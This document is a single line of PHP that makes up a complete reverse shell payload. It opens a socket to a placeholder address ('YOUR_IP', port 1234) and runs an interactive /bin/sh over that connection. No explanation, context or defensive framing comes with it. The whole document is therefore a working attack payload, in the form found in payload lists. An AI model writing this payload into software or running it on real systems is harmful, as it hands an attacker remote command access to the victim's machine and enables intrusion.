$ip = 'YOUR_IP';$port = 1234;$sock=fsockopen($ip,$port);exec("/bin/sh -i <&3 >&3 2>&3");